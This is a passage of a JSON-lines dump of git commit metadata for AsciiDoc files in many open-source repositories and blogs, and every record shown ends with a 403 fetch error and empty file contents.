'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"60ba8314ef972f67e2ad2cc36e4dd0289c2a0621","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd7b10aab0a511fd40ea2cade1f90898be0853d5","subject":"Add code of conduct","message":"Add code of conduct\n\nfixes gh-14\n","repos":"mp911de\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config,rhoegg\/spring-cloud-vault-config,rhoegg\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config,mp911de\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-vault-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"344375a1686cf8862bdf217447844049c1d2b5da","subject":"new blog","message":"new blog\n","repos":"hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/12\/hawkular-and-prometheus.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/12\/hawkular-and-prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a8f35f845a5b319a30d10ff0f5ac6dd5e2abaaa","subject":"First cut at version tracking table (AsciiDoc)","message":"First cut at version tracking table (AsciiDoc)","repos":"msgilligan\/mastercoin-vagrant","old_file":"versions.adoc","new_file":"versions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/mastercoin-vagrant.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eef20da6506efabd8874f554e45b2477f3c8096c","subject":"Fix table formatting in full data dirs docs","message":"Fix table formatting in full data dirs docs\n\nChange-Id: I098c64c3241e5fc4184b102e10ef619feb7de30a\nReviewed-on: 
http:\/\/gerrit.cloudera.org:8080\/10211\nTested-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3092eeba15c82d4fc856ac4b66f9e2ceaaed97d","subject":"VMXNET3 - Ubuntu not Fedora","message":"VMXNET3 - Ubuntu not Fedora\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6d0918fec6099457df304afe919305afd0b4468","subject":"create post This Slime Could Be Good For Your Phone...","message":"create post This Slime Could Be Good For Your Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-This-Slime-Could-Be-Good-For-Your-Phone....adoc","new_file":"_posts\/2018-02-26-This-Slime-Could-Be-Good-For-Your-Phone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a948e306a836ed8d8f91d491bfaf0c2509c44ec","subject":"Update 2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","message":"Update 2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","new_file":"_posts\/2016-05-13-Static-analysis-tools-for-Java-landscape-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cf4b62377a56494e40bccbe55d52e99f5bd76df","subject":"Fix some installation docs which referred to internal git URL","message":"Fix some installation docs which referred to internal git URL\n\nChange-Id: 
If7ba73cf3b2e4dedd67a5d060121badc90d0205c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1066\nReviewed-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc7843a7e00979d8de64a7f7b1eb6e1c196ee248","subject":"Update 2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","message":"Update 2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","new_file":"_posts\/2016-08-03-Episode-67-Harry-Nutter-and-the-Call-in-Collector.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c378652ac06340b864004ee0c281b73ca2643db","subject":"Update 2016-03-06-Study-plan.adoc","message":"Update 2016-03-06-Study-plan.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2016-03-06-Study-plan.adoc","new_file":"_posts\/2016-03-06-Study-plan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bahamoth\/bahamoth.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e461e9347b967b6123cab9598b17eea6d785afc8","subject":"Update 2018-02-26-Firebae-Ui.adoc","message":"Update 2018-02-26-Firebae-Ui.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-Firebae-Ui.adoc","new_file":"_posts\/2018-02-26-Firebae-Ui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f02d520aa8fcf17b12e081dddc7a87021e0bd3","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 
2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95dc4ba0c9c4d4169ff61133e71332dd80e8cc5f","subject":"Update 2017-12-03-Trying-to-find-normal.adoc","message":"Update 2017-12-03-Trying-to-find-normal.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-12-03-Trying-to-find-normal.adoc","new_file":"_posts\/2017-12-03-Trying-to-find-normal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e93b1ecfc425fc377508bd679dda4bee169c767","subject":"Update 2016-07-14-blah-blah-blah.adoc","message":"Update 2016-07-14-blah-blah-blah.adoc","repos":"fuzzy-logic\/fuzzy-logic.github.io,fuzzy-logic\/fuzzy-logic.github.io,fuzzy-logic\/fuzzy-logic.github.io,fuzzy-logic\/fuzzy-logic.github.io","old_file":"_posts\/2016-07-14-blah-blah-blah.adoc","new_file":"_posts\/2016-07-14-blah-blah-blah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuzzy-logic\/fuzzy-logic.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a64dfcfaa9f58db1c50c74ae2352aba87b0fd5f","subject":"completed first draft of docs","message":"completed first draft of docs\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c870eb34b91a3834f9dccaacc44fc43344703f12","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a05393ba8f8f14907a9c35f6b5bc672305ccddc","subject":"Added topic load balancer EIP docs","message":"Added topic load balancer EIP 
docs\n","repos":"akhettar\/camel,gnodet\/camel,pax95\/camel,akhettar\/camel,kevinearls\/camel,anoordover\/camel,tdiesler\/camel,dmvolod\/camel,nikhilvibhav\/camel,snurmine\/camel,gnodet\/camel,kevinearls\/camel,jonmcewen\/camel,tdiesler\/camel,snurmine\/camel,anoordover\/camel,christophd\/camel,dmvolod\/camel,curso007\/camel,kevinearls\/camel,DariusX\/camel,jamesnetherton\/camel,onders86\/camel,adessaigne\/camel,curso007\/camel,jonmcewen\/camel,tadayosi\/camel,objectiser\/camel,tadayosi\/camel,snurmine\/camel,nicolaferraro\/camel,onders86\/camel,anoordover\/camel,snurmine\/camel,adessaigne\/camel,jamesnetherton\/camel,tadayosi\/camel,ullgren\/camel,jonmcewen\/camel,sverkera\/camel,cunningt\/camel,akhettar\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,punkhorn\/camel-upstream,tdiesler\/camel,CodeSmell\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,Fabryprog\/camel,DariusX\/camel,nikhilvibhav\/camel,Fabryprog\/camel,dmvolod\/camel,pmoerenhout\/camel,jamesnetherton\/camel,jamesnetherton\/camel,mcollovati\/camel,DariusX\/camel,apache\/camel,tdiesler\/camel,onders86\/camel,christophd\/camel,zregvart\/camel,onders86\/camel,apache\/camel,cunningt\/camel,alvinkwekel\/camel,mcollovati\/camel,DariusX\/camel,ullgren\/camel,ullgren\/camel,tdiesler\/camel,rmarting\/camel,pmoerenhout\/camel,apache\/camel,alvinkwekel\/camel,gautric\/camel,davidkarlsen\/camel,gautric\/camel,CodeSmell\/camel,rmarting\/camel,pax95\/camel,sverkera\/camel,zregvart\/camel,CodeSmell\/camel,rmarting\/camel,jonmcewen\/camel,Fabryprog\/camel,cunningt\/camel,christophd\/camel,pax95\/camel,tadayosi\/camel,adessaigne\/camel,jonmcewen\/camel,nicolaferraro\/camel,davidkarlsen\/camel,kevinearls\/camel,pmoerenhout\/camel,akhettar\/camel,ullgren\/camel,gnodet\/camel,akhettar\/camel,snurmine\/camel,christophd\/camel,gautric\/camel,rmarting\/camel,cunningt\/camel,kevinearls\/camel,pmoerenhout\/camel,gautric\/camel,objectiser\/camel,anoordover\/camel,mcollovati\/camel,Fabryprog\/camel,alvinkwekel\/camel,zregvart\/camel,pmoerenhout\/camel,objectiser\/camel,curso007\/camel,objectiser\/camel,punkhorn\/camel-upstream,rmarting\/camel,jonmcewen\/camel,apache\/camel,rmarting\/camel,jamesnetherton\/camel,sverkera\/camel,pax95\/camel,anoordover\/camel,gautric\/camel,pax95\/camel,cunningt\/camel,cunningt\/camel,sverkera\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,apache\/camel,kevinearls\/camel,nicolaferraro\/camel,onders86\/camel,dmvolod\/camel,nicolaferraro\/camel,sverkera\/camel,CodeSmell\/camel,curso007\/camel,snurmine\/camel,nikhilvibhav\/camel,akhettar\/camel,punkhorn\/camel-upstream,onders86\/camel,dmvolod\/camel,curso007\/camel,mcollovati\/camel,alvinkwekel\/camel,tdiesler\/camel,anoordover\/camel,davidkarlsen\/camel,christophd\/camel,zregvart\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,gnodet\/camel,davidkarlsen\/camel,tadayosi\/camel,christophd\/camel,jamesnetherton\/camel,curso007\/camel,gautric\/camel,dmvolod\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/topic-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/topic-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2a5029d93762a05069e991ae7c01f42906d6ad6","subject":"Init IBM","message":"Init IBM\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"IBM Cloud.adoc","new_file":"IBM 
Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21245cb295edbdff97e74e0e48a5356db81a6d8f","subject":"Created documentation for the HttpMonitor monitor.","message":"Created documentation for the HttpMonitor monitor.\n\nCyrille\n","repos":"aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c61f6a22c3413f8763066088bc1b77cc71781be1","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d2e54048769bd21aba901f2cc8942a65697fce8","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6eccd84ef4f7c5251628efbd49cb3d8f39d3b515","subject":"Update 2016-03-19-Kitap-Arsivleri.adoc","message":"Update 2016-03-19-Kitap-Arsivleri.adoc","repos":"sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io","old_file":"_posts\/2016-03-19-Kitap-Arsivleri.adoc","new_file":"_posts\/2016-03-19-Kitap-Arsivleri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sinemaga\/sinemaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"74c1f860292e3ea99fcf210fc0b343a9338e3004","subject":"Update 2015-07-09-Believing-in-people.adoc","message":"Update 2015-07-09-Believing-in-people.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-09-Believing-in-people.adoc","new_file":"_posts\/2015-07-09-Believing-in-people.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f84d9c98844d316f6f55098b8e8f89762ab0515","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77d2d11d1e016f6042c2672131cce82003907cbd","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c1d30d8483d82b6cd1f0b62b16afe177251fe3","subject":"Update 2017-06-19-serposcope.adoc","message":"Update 2017-06-19-serposcope.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-serposcope.adoc","new_file":"_posts\/2017-06-19-serposcope.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"279c6c7a42a9dff56abb284e3c67e4e6fc5faf15","subject":"SWARM-1664 MP Fault tolerance build should trigger TCK by default correct readme to introduce new property to skip TCK","message":"SWARM-1664 MP Fault tolerance build should trigger TCK by default\ncorrect readme to introduce new property to skip TCK\n\nSigned-off-by: Antoine Sabot-Durand 
<9359a4d812173b65a3a0094cd86363e79731a3c2@sabot-durand.net>\n","repos":"wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bb738be3b1205da8f8f8b9613babe84db73dcf2","subject":"Add README","message":"Add README\n","repos":"sauthieg\/wisdom-oauth2-protection","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sauthieg\/wisdom-oauth2-protection.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e21bd592b711972c702b4c38f2e3590c59545ea","subject":"Fix broken example in README","message":"Fix broken example in README\n","repos":"rumpelsepp\/pynote","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4200f5409a113da1d66413039295c07ce4ae022f","subject":"Added basic readme (#13)","message":"Added basic readme (#13)\n\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8f73820ea1b882c813c783e8e8cf0db915fff3f","subject":"Update 2015-10-08-Markov.adoc","message":"Update 2015-10-08-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2015-10-08-Markov.adoc","new_file":"_posts\/2015-10-08-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8754672c20acb9fcc765e45b38e193ae5e9340c6","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f4922a11d5c357746f86627e833dfdd5c54c365","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfb2a20e72b83a921978748a2efb4cb44895016e","subject":"Update 2015-01-31-Useful-Rails-Helper-part2.adoc","message":"Update 